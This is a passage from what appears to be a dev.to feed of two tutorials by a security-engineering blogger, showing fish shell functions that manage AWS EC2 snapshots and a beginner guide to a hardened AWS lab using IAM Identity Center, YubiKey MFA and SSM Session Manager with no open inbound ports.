S3. A heavily loaded instance may take up to 10-15 minutes. Do not interrupt it.</p> </blockquote> <h3> lab-restore — Launch an Instance from a Snapshot </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-restore echo "Your saved AMIs:" aws ec2 describe-images \ --owners self \ --query "Images[*].[ImageId,Name,CreationDate]" \ --output table \ --profile lab-sso read --prompt-str "Enter AMI ID to restore from (ami-...): " ami_id if test -z "$ami_id" echo "ERROR: No AMI ID entered. Cancelled." return 1 end set sg_id (aws ec2 describe-security-groups \ --filters "Name=group-name,Values=suricata-lab-sg" \ --query "SecurityGroups[0].GroupId" \ --output text \ --profile lab-sso) if test -z "$sg_id" echo "ERROR: Could not find security group suricata-lab-sg." return 1 end echo "Launching from snapshot $ami_id..." set new_id (aws ec2 run-instances \ --image-id $ami_id \ --instance-type t2.micro \ --iam-instance-profile Name=suricata-lab-ssm-role \ --security-group-ids $sg_id \ --tag-specifications "ResourceType=instance,Tags=[{Key=Name,Value=suricata-ids-lab}]" \ --profile lab-sso \ --query "Instances[0].InstanceId" \ --output text) if test -z "$new_id" echo "ERROR: Failed to launch instance. Check AMI ID and try again." return 1 end echo "Instance launched: $new_id" echo "Updating INSTANCE_ID..." set -U INSTANCE_ID $new_id echo "Waiting for instance to reach running state..." aws ec2 wait instance-running \ --instance-ids $new_id \ --profile lab-sso echo "Instance is running." echo "Waiting 60 seconds for SSM Agent to initialize..." sleep 60 echo "Ready. Run lab-connect to start your session." end </code></pre> </div> <p>Lists your saved AMIs first so you never need to look up the AMI ID separately. The security group ID is resolved automatically by name.</p> <p><code>sleep 60</code> instead of <code>sleep 180</code> — the SSM Agent is already baked into the snapshot so it initializes much faster than a fresh install.</p> <h3> lab-snapshot-delete — Delete Old Snapshots </h3> <p>Over time you will accumulate outdated snapshots. Each one costs ~$0.05/GB/month so it is good practice to delete ones you no longer need. You can delete multiple snapshots in one go — type each AMI ID on its own line and press <strong>Ctrl+D</strong> when done.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-snapshot-delete echo "Your saved AMIs:" aws ec2 describe-images \ --owners self \ --query "Images[*].[ImageId,Name,CreationDate]" \ --output table \ --profile lab-sso echo "" echo "Enter AMI IDs to delete, one per line." echo "Press Ctrl+D when done." echo "" set ami_ids while read --prompt-str "" ami_id set --append ami_ids $ami_id end if test (count $ami_ids) -eq 0 echo "No AMI IDs entered. Cancelled." return 1 end echo "" echo "The following snapshots will be permanently deleted:" for ami_id in $ami_ids echo " - $ami_id" end echo "" read --prompt-str "Type YES to confirm deletion of all "(count $ami_ids)" snapshot(s): " confirm if test "$confirm" != "YES" echo "Cancelled." return 0 end for ami_id in $ami_ids echo "" echo "Processing $ami_id..." set snapshot_id (aws ec2 describe-images \ --image-ids $ami_id \ --query "Images[0].BlockDeviceMappings[0].Ebs.SnapshotId" \ --output text \ --profile lab-sso) if test -z "$snapshot_id" -o "$snapshot_id" = "None" echo "WARNING: Could not find snapshot for $ami_id — skipping." continue end aws ec2 deregister-image \ --image-id $ami_id \ --profile lab-sso echo "AMI deregistered: $ami_id" aws ec2 delete-snapshot \ --snapshot-id $snapshot_id \ --profile lab-sso echo "Snapshot deleted: $snapshot_id" end echo "" echo "Done. Storage charges for deleted snapshots will stop within the hour." end </code></pre> </div> <p>The flow when deleting multiple snapshots at once:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">$</span><span class="w"> </span>lab-snapshot-delete <span class="go"> Your saved AMIs: +------------------------+---------------------------+----------------------+ | ami-0xxxxxxxxxxxxxxxxx | suricata_setup-2026-03-15 | 2026-03-15T12:00:00Z | | ami-0yyyyyyyyyyyyyyyyy | suricata_rules-2026-03-20 | 2026-03-20T10:14:00Z | | ami-0zzzzzzzzzzzzzzzzz | suricata_full-2026-03-25 | 2026-03-25T08:30:00Z | +------------------------+---------------------------+----------------------+ Enter AMI IDs to delete, one per line. Press Ctrl+D when done. ami-0xxxxxxxxxxxxxxxxx ami-0yyyyyyyyyyyyyyyyy ami-0zzzzzzzzzzzzzzzzz ^D The following snapshots will be permanently deleted: - ami-0xxxxxxxxxxxxxxxxx - ami-0yyyyyyyyyyyyyyyyy - ami-0zzzzzzzzzzzzzzzzz Type YES to confirm deletion of all 3 snapshot(s): YES Processing ami-0xxxxxxxxxxxxxxxxx... AMI deregistered: ami-0xxxxxxxxxxxxxxxxx Snapshot deleted: snap-0xxxxxxxxxxxxxxxxx Processing ami-0yyyyyyyyyyyyyyyyy... AMI deregistered: ami-0yyyyyyyyyyyyyyyyy Snapshot deleted: snap-0yyyyyyyyyyyyyyyyy Processing ami-0zzzzzzzzzzzzzzzzz... AMI deregistered: ami-0zzzzzzzzzzzzzzzzz Snapshot deleted: snap-0zzzzzzzzzzzzzzzzz Done. Storage charges for deleted snapshots will stop within the hour. </span></code></pre> </div> <p><strong>Two steps are required to fully delete a snapshot — this is an important AWS quirk:</strong></p> <p><strong>Step 1 — Deregister the AMI</strong> (<code>aws ec2 deregister-image</code>) — removes the AMI entry. But the underlying EBS snapshot is still there and still billing you until Step 2.</p> <p><strong>Step 2 — Delete the EBS snapshot</strong> (<code>aws ec2 delete-snapshot</code>) — this is what actually frees the storage and stops charges.</p> <p><code>lab-snapshot-delete</code> handles both steps automatically for every ID in the list.</p> <h2> Complete Reference </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Function</th> <th>What it does</th> </tr> </thead> <tbody> <tr> <td><code>lab-login</code></td> <td>Authenticate via IAM Identity Center (YubiKey tap)</td> </tr> <tr> <td><code>lab-status</code></td> <td>Check if instance is running, stopped, or terminated</td> </tr> <tr> <td><code>lab-start</code></td> <td>Start a stopped instance</td> </tr> <tr> <td><code>lab-stop</code></td> <td>Stop a running instance (EBS persists, small charge)</td> </tr> <tr> <td><code>lab-connect</code></td> <td>Open a shell via SSM Session Manager</td> </tr> <tr> <td><code>lab-terminate</code></td> <td>Permanently delete the instance (zero ongoing cost)</td> </tr> <tr> <td><code>lab-create</code></td> <td>Launch a fresh instance from Launch Template</td> </tr> <tr> <td><code>lab-snapshot-list</code></td> <td>List all saved AMI snapshots</td> </tr> <tr> <td><code>lab-snapshot</code></td> <td>Save current instance state to an encrypted AMI snapshot</td> </tr> <tr> <td><code>lab-restore</code></td> <td>Launch an instance from a saved AMI snapshot</td> </tr> <tr> <td><code>lab-snapshot-delete</code></td> <td>Delete one or more AMIs and their underlying EBS snapshots (line-separated input, Ctrl+D to finish)</td> </tr> </tbody> </table></div> <h2> Complete Zero-Cost Session Workflow </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-login # tap YubiKey → 8hr credentials lab-restore # launch from snapshot → wait → "Ready" lab-connect # shell as ssm-user lab-snapshot # save progress before ending session lab-terminate # zero ongoing cost </code></pre> </div> <h2> The Open Source Project Behind This </h2> <p>These functions are part of an open source repository of LeetCode-style <strong>secure coding exercises</strong> designed to:</p> <ol> <li>Train developers to write secure code</li> <li>Prepare security engineers for technical interviews</li> </ol> <p>Every exercise in the repo has 60+ test cases and a companion Dev.to post.</p> <p><strong>If this post was useful, the best thing you can do is star the repo:</strong></p> <p><a href="https://github.com/fosres/SecEng-Exercises" class="crayons-btn crayons-btn--primary" rel="noopener noreferrer">🌟 Star the SecEng-Exercises Repo on GitHub</a> </p> <h2> One More Thing — Quick Poll </h2> <p>Why do you read security engineering blog posts? Your answer helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong></p> <p>Takes 10 seconds.</p> <p><em>Series: Security Engineering Interview Prep | Week 9 | March 2026</em><br> <em>GitHub: <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">fosres/SecEng-Exercises</a></em></p> aws security devsecops tutorial fosres Sun, 15 Mar 2026 18:15:54 +0000 https://dev.to/fosres/secure-aws-lab-setup-for-security-engineers-iam-identity-center-ssm-zero-open-ports-1hfn https://dev.to/fosres/secure-aws-lab-setup-for-security-engineers-iam-identity-center-ssm-zero-open-ports-1hfn <p>AWS, GCP, and Azure are the three dominant cloud providers in the industry. As a Security Engineer you will encounter at least one of them in virtually every role — whether you are securing infrastructure, reviewing architecture, responding to incidents, or building detection rules. You do not need to master all three. But you do need to go deep on at least one.</p> <p>This post is about AWS — the most widely deployed of the three and the one most commonly required in Security Engineering job postings. Learning AWS deeply means understanding not just how to launch a virtual machine, but how identity works, how access is controlled, how services communicate securely, and how to build infrastructure that is defensible by design.</p> <p>This post is written for a <strong>complete beginner to AWS</strong>. By the end you will know how to do the following entirely from your local computer using the CLI — no browser required after initial setup:</p> <ul> <li> <strong>Login</strong> to AWS securely using either static credentials or a hardware security key (YubiKey)</li> <li> <strong>Create</strong> an EC2 instance (a virtual machine in the cloud) with one command</li> <li> <strong>Connect</strong> to that instance without SSH, without open ports, and without a key pair file</li> <li> <strong>Stop</strong> the instance to pause billing when not in use</li> <li> <strong>Terminate</strong> the instance permanently to pay zero ongoing cost between sessions</li> </ul> <p>Along the way the post covers IAM (Identity and Access Management), IAM Identity Center, SSM Session Manager, security groups, IAM roles, Launch Templates, and fish shell automation — all grounded in real decisions made during a Week 9 Suricata IDS lab setup.</p> <p>Everything documented here is a real setup that was built step by step, including the failures. If something broke, it is noted and the fix is included.</p> <p>If you find this useful, I'd really appreciate a ⭐ on my open source secure coding exercise repo — it helps a lot:</p> <p><a href="https://github.com/fosres/SecEng-Exercises" class="crayons-btn crayons-btn--primary" rel="noopener noreferrer">Support this project — Star it on GitHub! ⭐</a> </p> <p>Also — quick question: why do you read security engineering blog posts? One click helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong> (takes 10 seconds)</p> <h2> What This Post Covers </h2> <p>This is the exact setup I built during Week 9 of my Security Engineering curriculum while preparing to run a Suricata IDS lab on AWS EC2. What started as "just spin up an instance" turned into a proper secure access architecture covering:</p> <ul> <li>Why root credentials are dangerous (and what to use instead)</li> <li>Two CLI auth methods: IAM Access Keys (simple) vs IAM Identity Center (secure)</li> <li>EC2 instance with <strong>zero open inbound ports</strong> — no SSH, no bastion host</li> <li>SSM Session Manager for terminal access through AWS</li> <li>Fish shell lab functions: <code>lab-login</code>, <code>lab-create</code>, <code>lab-connect</code>, <code>lab-terminate</code> </li> <li>A Launch Template for repeatable, cost-free instance lifecycle</li> <li>The <code>iam:PassRole</code> error you will hit with PowerUserAccess — and the exact fix</li> </ul> <p><strong>Curriculum intersections:</strong> This covers Week 15 content (EC2, IAM basics) and Week 49 content (IAM Identity Center) — completed early as infrastructure prerequisites for the IDS lab.</p> <h2> Part 1: Why Not Root Credentials </h2> <p>Every AWS account has a root user with unlimited permissions that cannot be restricted by any IAM policy. AWS explicitly states you should never use root for everyday tasks.</p> <p>Root should only ever be used for:</p> <ul> <li>Billing and payment settings </li> <li>Account closure </li> <li>IAM recovery if all other admin access is lost </li> </ul> <blockquote> <p>⚠️ <strong>Never</strong> run <code>aws configure</code> with root credentials. Never create root access keys. Root should only authenticate via the console with MFA.</p> </blockquote> <p>On this account root is protected with two YubiKeys registered as FIDO2 devices. That is the last line of defense.</p> <h2> Part 1.5: First — Create an AWS Account </h2> <p>Before anything else you need an AWS account. Go to <a href="https://aws.amazon.com" rel="noopener noreferrer">aws.amazon.com</a> and sign up — it takes about 5 minutes and requires a credit card for identity verification. AWS has a generous free tier that covers most personal lab usage including the t2.micro instance type used throughout this post.</p> <p>The account you create becomes your <strong>root account</strong>. Read Part 1 above before using it for anything.</p> <h2> Part 2: Create a Scoped IAM User </h2> <p>Create an IAM user with only the permissions needed for lab work. This limits blast radius if credentials are ever compromised.</p> <h3> Step 1 — Create the User </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Console → Users → Create user → Username: your_username_here → Check: Provide user access to AWS Management Console → Select: I want to create an IAM user → Custom password: (set a strong password) → Uncheck: Users must create new password at next sign-in → Next </code></pre> </div> <h3> Step 2 — Attach Permissions </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>→ Attach policies directly → Search and check: AmazonEC2FullAccess → Search and check: AmazonSSMFullAccess → Next → Create user </code></pre> </div> <blockquote> <p><strong>Do NOT attach AdministratorAccess.</strong> The two policies above give enough permissions to manage EC2 and SSM without touching IAM or billing.</p> </blockquote> <h3> Step 3 — Add MFA for Console Login </h3> <p>AWS supports two MFA methods for IAM users. Choose one:</p> <p><strong>Option A — Authenticator App (TOTP)</strong><br> The most common method. Install Google Authenticator, Authy, or 1Password on your phone. AWS shows a QR code — scan it, enter two consecutive 6-digit codes to confirm, done. No hardware required.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM → Users → your_username_here → Security credentials tab → Multi-factor authentication (MFA) → Assign MFA device → MFA device type: Authenticator app → Scan the QR code with your authenticator app → Enter two consecutive 6-digit codes to confirm </code></pre> </div> <p><strong>Option B — Hardware Security Key (FIDO2/YubiKey)</strong><br> More secure than TOTP. Requires a physical YubiKey or similar FIDO2 device (~$50). Immune to phishing because the key cryptographically binds to the origin domain — a fake AWS login page cannot steal it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM → Users → your_username_here → Security credentials tab → Multi-factor authentication (MFA) → Assign MFA device → MFA device type: Passkey or security key → Insert YubiKey and tap when prompted </code></pre> </div> <blockquote> <p><strong>This post uses Option B (YubiKey).</strong> TOTP is acceptable for a personal lab and requires no extra hardware. YubiKey is the stronger choice and becomes important in Part 11 where it enables hardware-backed MFA directly on CLI calls — something TOTP cannot do.</p> </blockquote> <p>Note the console sign-in URL shown on the user creation confirmation page:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://&lt;YOUR_ACCOUNT_ID&gt;.signin.aws.amazon.com/console </code></pre> </div> <p>This is different from the root login page. Bookmark it.</p> <h2> Part 3: Method 1 — IAM Access Keys (Static Credentials) </h2> <p>The simpler method. Permanent access key stored locally. Never expires unless manually deleted — which is both convenient and dangerous.</p> <h3> Install AWS CLI v2 on Debian 12/13 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Install dependencies</span> <span class="nb">sudo </span>apt update <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>apt <span class="nb">install </span>curl unzip <span class="nt">-y</span> <span class="c"># Download from AWS directly</span> <span class="c"># Note: never use apt install awscli — the Debian repo does not include v2</span> curl <span class="s2">"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip"</span> <span class="nt">-o</span> <span class="s2">"awscliv2.zip"</span> unzip awscliv2.zip <span class="nb">sudo</span> ./aws/install <span class="c"># Verify</span> aws <span class="nt">--version</span> <span class="c"># aws-cli/2.34.9 Python/3.13.11 Linux/6.1.0-43-amd64 exe/x86_64.debian.12</span> </code></pre> </div> <h3> Create the Access Key </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM → Users → your_username_here → Security credentials tab → Access keys → Create access key → Use case: Command Line Interface (CLI) → Check the amber warning confirmation box → Next → Create access key → DOWNLOAD .csv FILE IMMEDIATELY </code></pre> </div> <blockquote> <p>⚠️ AWS shows the Secret Access Key exactly <strong>once</strong>. If you close the page without saving it you must delete the key and create a new one. Always download the .csv before clicking Done.</p> </blockquote> <h3> Configure the CLI </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws configure <span class="c"># AWS Access Key ID: AKIA... (from the .csv)</span> <span class="c"># AWS Secret Access Key: ... (from the .csv) </span> <span class="c"># Default region name: us-east-1</span> <span class="c"># Default output format: json</span> </code></pre> </div> <h3> Verify Identity — What is STS? </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws sts get-caller-identity </code></pre> </div> <p><strong>STS = Security Token Service.</strong> The <code>get-caller-identity</code> command asks AWS "who am I authenticated as right now?" It is the fastest way to verify credentials are working correctly.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"UserId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AIDA xxxxxxxxxxxxxxxxxxxx"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Account"</span><span class="p">:</span><span class="w"> </span><span class="s2">"YOUR_ACCOUNT_ID"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Arn"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:iam::YOUR_ACCOUNT_ID:user/your_username_here"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>✅ If the ARN shows <code>user/your_username_here</code> (not root) — the access key is working.</p> <h2> Part 4: Create the IAM Role for EC2 </h2> <p>The EC2 instance needs its own identity to communicate with AWS Systems Manager. This is <strong>separate</strong> from your user identity.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Console → Roles → Create role → Trusted entity: AWS service → Use case: EC2 → Next → Search: AmazonSSMManagedInstanceCore → Check the box → Next → Role name: suricata-lab-ssm-role → Create role </code></pre> </div> <p><strong>Key distinction — two separate identities:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>YOU (your_username_here) → authenticated via IAM credentials can start SSM sessions, launch EC2 EC2 INSTANCE → authenticated via suricata-lab-ssm-role can communicate with SSM can receive your session connection </code></pre> </div> <p>The role is the instance's identity, not yours. This is why <code>iam:PassRole</code> matters (covered in Part 14).</p> <h2> Part 5: Security Group — Zero Open Ports </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>EC2 → Security Groups → Create security group → Name: suricata-lab-sg → Inbound rules: DELETE any default rules → NONE → Outbound rules: keep default (all traffic) → Create security group </code></pre> </div> <p>This is the key to the whole architecture. SSM Session Manager works over <strong>outbound HTTPS (port 443)</strong> to reach AWS endpoints. No inbound ports needed. No port 22. No bastion host. Your VPN IP is completely irrelevant.</p> <blockquote> <p><strong>Note:</strong> EC2 Instance Connect will NOT work with no inbound rules. This is intentional. SSM replaces SSH entirely.</p> </blockquote> <h2> Part 6: Launch EC2 Instance — The User Data Bootstrap </h2> <p>This is where Debian 13 causes a surprise. Several approaches fail before finding the correct solution.</p> <p><strong>What failed:</strong></p> <ul> <li>EC2 Instance Connect → Debian 13 AMI has no <code>ec2-instance-connect</code> package</li> <li>CloudShell <code>aws ssm send-command</code> → requires SSM Agent to already be installed</li> <li>Temporarily opening port 22 → EC2 Instance Connect still fails (no package)</li> </ul> <p><strong>The correct solution: User Data</strong></p> <p>User Data runs as root on first boot before you ever connect. It installs the SSM Agent automatically.</p> <h3> Launch Configuration </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>EC2 → Launch Instance Name: suricata-ids-lab AMI: Debian 13 (Bookworm) → Browse AMIs → AWS Marketplace AMIs → Search: Debian 13 → Publisher: Debian (official only — verify this) Instance type: t2.micro (free tier eligible) Key pair: Proceed without a key pair Security group: Select existing → suricata-lab-sg Advanced details: IAM instance profile: suricata-lab-ssm-role </code></pre> </div> <h3> User Data Script (paste in Advanced details → User data) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> apt-get update <span class="nt">-y</span> wget https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/debian_amd64/amazon-ssm-agent.deb dpkg <span class="nt">-i</span> amazon-ssm-agent.deb systemctl <span class="nb">enable </span>amazon-ssm-agent systemctl start amazon-ssm-agent </code></pre> </div> <blockquote> <p>Wait <strong>3-5 minutes</strong> after launch before trying to connect. The User Data script needs time to complete on first boot.</p> </blockquote> <h2> Part 7: Install Session Manager Plugin Locally </h2> <p>One-time install on your <strong>local machine</strong> (not the EC2 instance):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="s2">"https://s3.amazonaws.com/session-manager-downloads/plugin/latest/ubuntu_64bit/session-manager-plugin.deb"</span> <span class="se">\</span> <span class="nt">-o</span> <span class="s2">"/tmp/session-manager-plugin.deb"</span> <span class="nb">sudo </span>dpkg <span class="nt">-i</span> /tmp/session-manager-plugin.deb <span class="c"># Verify</span> session-manager-plugin <span class="nt">--version</span> </code></pre> </div> <h2> Part 8: Fish Shell Lab Functions </h2> <p>All lab operations wrapped in fish functions using the universal variable <code>INSTANCE_ID</code>. One <code>set -U</code> command updates everything simultaneously.</p> <h3> Set the Instance ID (run once after launch) </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># set -U creates a universal variable — persists across all sessions permanently # No source command, no file editing, no restart needed set -U INSTANCE_ID "i-your_instance_id_here" </code></pre> </div> <h3> Create the Functions </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir</span> <span class="nt">-p</span> ~/.config/fish/functions </code></pre> </div> <p>Fish loads functions automatically from <code>~/.config/fish/functions/</code>. Each function lives in its own file named after the function. For each snippet below, copy the contents and save it to the filename shown in bold — for example, copy the <code>lab-status</code> function into a file called <code>lab-status.fish</code> inside that directory.</p> <p><strong>lab-status.fish</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-status aws ec2 describe-instances --instance-ids $INSTANCE_ID \ --profile lab-sso \ --query "Reservations[0].Instances[0].State.Name" \ --output text end </code></pre> </div> <p><strong>lab-start.fish</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-start aws ec2 start-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Starting... wait 60 seconds" end </code></pre> </div> <p><strong>lab-stop.fish</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-stop aws ec2 stop-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Stopping..." end </code></pre> </div> <p><strong>lab-connect.fish</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-connect aws ssm start-session --target $INSTANCE_ID --profile lab-sso end </code></pre> </div> <p><strong>lab-login.fish</strong> (SSO only — covered in Part 11)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-login aws sso login --profile lab-sso end </code></pre> </div> <p><strong>lab-terminate.fish</strong></p> <h2> **NOTE: Once you are done using an EC2 instance for tutorial exercises such as these you should execute <code>lab-terminate</code> in your local CLI to destory the EC2 instance. This will minimize Billing! </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-terminate echo "WARNING: This will permanently delete the instance and all data on it." echo "Instance: $INSTANCE_ID" read --prompt-str "Type YES to confirm: " confirm if test "$confirm" = "YES" aws ec2 terminate-instances \ --instance-ids $INSTANCE_ID --profile lab-sso echo "Instance terminated. Use lab-create to launch a fresh one." else echo "Cancelled." end end </code></pre> </div> <blockquote> <p>⚠️ <strong>Fish syntax bug:</strong> Use <code>--prompt-str</code> not <code>--prompt</code> for the <code>read</code> command. Using <code>--prompt</code> causes a syntax error that <strong>silently skips the confirmation</strong> and immediately terminates the instance. Ask me how I know.</p> </blockquote> <h2> Part 9: Verify the Access Key Method Works </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-status # → running lab-connect # → Starting session with SessionId: your_username_here-.... whoami # → ssm-user </code></pre> </div> <p>✅ <strong>ssm-user</strong> means SSM Session Manager is working end-to-end. No SSH keys, no open ports, no IP whitelisting. Your VPN connection is irrelevant.</p> <h2> Part 10: Why Switch to IAM Identity Center? </h2> <p>The Access Key method works — but it has fundamental security weaknesses. IAM Identity Center addresses all of them.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Property</th> <th>IAM Access Key</th> <th>IAM Identity Center</th> </tr> </thead> <tbody> <tr> <td>Credential lifetime</td> <td> <strong>Permanent</strong> — never expires</td> <td> <strong>8 hours max</strong> — auto-expire</td> </tr> <tr> <td>MFA on CLI</td> <td> <strong>No</strong> — TOTP only (phishing vulnerable)</td> <td> <strong>Yes</strong> — YubiKey FIDO2 ✓</td> </tr> <tr> <td>Phishing resistant</td> <td> <strong>No</strong> — fake page can steal key</td> <td> <strong>Yes</strong> — YubiKey is origin-bound</td> </tr> <tr> <td>Stored on disk</td> <td> <strong>Yes</strong> — <code>~/.aws/credentials</code> forever</td> <td>Temporary token only</td> </tr> <tr> <td>GitHub leak risk</td> <td> <strong>Catastrophic</strong> — permanent until revoked</td> <td> <strong>Minimal</strong> — expired when found</td> </tr> <tr> <td>Blast radius if stolen</td> <td>Full EC2+SSM access forever</td> <td>At most 8hr remaining session</td> </tr> <tr> <td>Revocation</td> <td>Manual — must find and delete</td> <td>Instant — delete user or session</td> </tr> </tbody> </table></div> <p><strong>The FIDO2 on CLI insight:</strong> The reason YubiKey works with Identity Center but not a plain access key is that <code>aws sso login</code> opens a browser — and the browser is where WebAuthn/FIDO2 works. Every CLI session starts with a YubiKey tap.</p> <p>This maps directly to what SAED — a Security Engineer at Google with 6+ years of experience — wrote in a LinkedIn post listing 40 concepts junior Security Engineers should focus on in 2026. Under the Identity, Access and Secrets category he includes specifically: <strong>"Least privilege, just in time and time bound access patterns."</strong> (<a href="https://www.linkedin.com/feed/update/urn:li:activity:7422250871062695937/" rel="noopener noreferrer">source</a>) IAM Identity Center is the practical implementation of that concept.</p> <h2> Part 11: Method 2 — IAM Identity Center Full Setup </h2> <p>Before setting up Identity Center, delete the static access key. The two methods should not coexist long-term.</p> <blockquote> <p><strong>Safer sequence:</strong> Deactivate the key first (reversible) → set up Identity Center → confirm <code>lab-connect</code> works → then permanently delete the key. Deleting before SSO is confirmed risks losing all CLI access.</p> </blockquote> <h3> Enable IAM Identity Center </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>AWS Console → search "IAM Identity Center" → Enable IAM Identity Center → Enable with AWS Organizations → Continue → wait 1-2 minutes Save from the Settings summary: Access portal URL: https://d-xxxxxxxxxx.awsapps.com/start Primary Region: us-east-1 </code></pre> </div> <blockquote> <p>IAM Identity Center can only be enabled in a single AWS Region. Match it to your EC2 region.</p> </blockquote> <h3> Configure MFA Settings (Critical) </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Settings → Configure MFA Prompt users for MFA: ● Every time they sign in (always-on) MFA types: ☑ Security keys and built-in authenticators (FIDO2) ☐ Authenticator apps ← leave UNCHECKED If no MFA device: ● Require them to register at sign in → Save </code></pre> </div> <p>Authenticator apps (TOTP) is intentionally left unchecked. TOTP is phishing-vulnerable. Enforcing FIDO2-only means every user must have a hardware security key. No weaker fallback permitted.</p> <h3> Create a Permission Set </h3> <p>A permission set is the bridge between an Identity Center user and an AWS account. It answers the question: <strong>once this user authenticates, what are they actually allowed to do?</strong></p> <p>Without a permission set you can authenticate successfully via IAM Identity Center and still have zero ability to do anything in AWS — authentication and authorization are separate steps. The permission set defines the authorization layer: which AWS actions the user can perform, which resources they can touch, and how long their session lasts before requiring re-authentication.</p> <p>This separation is itself a security principle. It means you can grant a user access to an account without giving them unlimited power inside it — and you can revoke or change their permissions without touching their login credentials.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Permission sets → Create permission set → Predefined permission set → Policy: PowerUserAccess → Permission set name: lab-power-user → Session duration: 8 hours → Create </code></pre> </div> <p><strong>What PowerUserAccess allows and denies:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Allows: ALL AWS actions EXCEPT iam:*, organizations:*, account:* Explicitly allows (narrow exceptions): iam:CreateServiceLinkedRole iam:DeleteServiceLinkedRole iam:ListRoles organizations:DescribeOrganization Does NOT include: iam:PassRole ← this matters (see Part 14) </code></pre> </div> <h3> Create an Identity Center User </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Users → Add user → Username: your_username_here → Password: Send an email to this user → Email address: your-email@example.com → First name / Last name: fill in → Next → Add user Check email → click activation link → set password </code></pre> </div> <h3> Register YubiKey for Identity Center User </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Users → your_username_here → MFA devices tab → Register device → Security key (FIDO2) → Insert YubiKey and tap when prompted → Register </code></pre> </div> <h3> Assign User to AWS Account </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Users → your_username_here → AWS accounts tab → Assign accounts → Select: your account (your_account_name_here / YOUR_ACCOUNT_ID) → Next → Select permission set: lab-power-user → Assign </code></pre> </div> <p><strong>Why this assignment matters:</strong></p> <p>The Identity Center user (<code>your_username_here</code>) is the authentication layer. The AWS account (<code>your_account_name_here</code>) is where all resources live. The permission set (<code>lab-power-user</code>) defines what actions are allowed inside that account. You can assign one user to multiple AWS accounts with different permission sets — that is the real power of Identity Center in multi-account organizations.</p> <h3> Configure AWS CLI for SSO </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws configure sso <span class="c"># Prompts:</span> <span class="c"># SSO session name: lab-sso</span> <span class="c"># SSO start URL: https://d-xxxxxxxxxx.awsapps.com/start</span> <span class="c"># SSO region: us-east-1</span> <span class="c"># SSO registration scopes: sso:account:access (press Enter)</span> <span class="c"># Browser opens automatically</span> <span class="c"># Log in → tap YubiKey</span> <span class="c"># Browser: "Your credentials have been shared successfully"</span> <span class="c"># Back in terminal:</span> <span class="c"># CLI default client Region: us-east-1</span> <span class="c"># CLI default output format: json</span> <span class="c"># CLI profile name: lab-sso</span> </code></pre> </div> <h3> Verify Identity Center Works </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws sts get-caller-identity <span class="nt">--profile</span> lab-sso </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"UserId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AROA 